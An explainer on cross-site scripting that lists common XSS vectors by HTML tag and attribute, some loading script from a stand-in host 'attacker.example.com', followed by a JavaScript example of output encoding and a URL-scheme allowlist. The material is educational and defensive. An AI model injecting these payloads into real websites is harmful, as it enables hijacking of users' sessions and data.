What is cross-site scripting?

Cross-site scripting (XSS) is a web vulnerability that lets a malicious hacker introduce (inject) undesired commands into legitimate client-side code (usually JavaScript) executed by a browser on behalf of the web application.

XSS attack vectors

Common HTML tags and attributes used to carry malicious JavaScript payloads in cross-site scripting attacks include:

The <script> tag:
    <script src=http://attacker.example.com/xss.js></script>
    <script> alert("XSS");</script>
The onload and onerror attributes:
    <img src=x onerror=alert("XSS")>
    <body onload=alert("XSS")>
The <body> tag attributes:
    <body background="javascript:alert('XSS')">
The <img> tag attributes:
    <img src="javascript:alert('XSS');">
    <img dynsrc="javascript:alert('XSS')">
    <img lowsrc="javascript:alert('XSS')">
The <iframe> tag:
    <iframe src="http://attacker.example.com/xss.html">
The <input> tag attributes:
    <input type="image" src="javascript:alert('XSS');">
The <link> tag:
    <link rel="stylesheet" href="javascript:alert('XSS');">
The <table> and <td> tag attributes:
    <table background="javascript:alert('XSS')">
    <td background="javascript:alert('XSS')">
The <div> tag attributes:
    <div style="background-image: url(javascript:alert('XSS'))">
    <div style="width: expression(alert('XSS'));">
The <object> tag:
    <object type="text/x-scriptlet" data="http://attacker.example.com/xss.html">
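
The vectors listed above reach the browser in two forms: as markup (tags and event-handler attributes) or as javascript: URLs placed in URL-bearing attributes. The following added example is not part of the original page; its function names, base URL, fallback image path and sample inputs are assumptions constructed for illustration. It shows the two matching defences: HTML-encoding untrusted text on output, and accepting only http/https URLs in URL attributes.

```javascript
// Added example: output encoding plus a URL-scheme allowlist.
// All names, the base URL and the fallback path are illustrative assumptions.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode untrusted text for an element body or a quoted attribute value,
// so tags and event-handler attributes arrive as inert text.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Resolve an untrusted URL the way a browser would (the WHATWG URL parser
// strips tabs, newlines and leading spaces and lower-cases the scheme), then
// accept it only if the resulting scheme is allowlisted. Returns null otherwise.
// This rejects javascript: URLs; it does not decide which hosts are trusted.
function safeUrl(untrusted, base = "https://app.example/") {
  let parsed;
  try {
    parsed = new URL(String(untrusted), base);
  } catch {
    return null;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Render a user comment: every untrusted value is validated and/or encoded
// for the context it lands in (URL attribute, text attribute, element body).
function renderComment(author, body, avatarUrl) {
  const src = safeUrl(avatarUrl) ?? "/img/default-avatar.png";
  return `<div class="comment"><img src="${escapeHtml(src)}" alt="${escapeHtml(author)}">` +
    `<p>${escapeHtml(body)}</p></div>`;
}

// Constructed sample input built from payloads in the list above.
const sample = renderComment(
  `x" onerror="alert('XSS')`,
  `<script> alert("XSS");</script>`,
  `javascript:alert('XSS')`
);
console.log(sample);
```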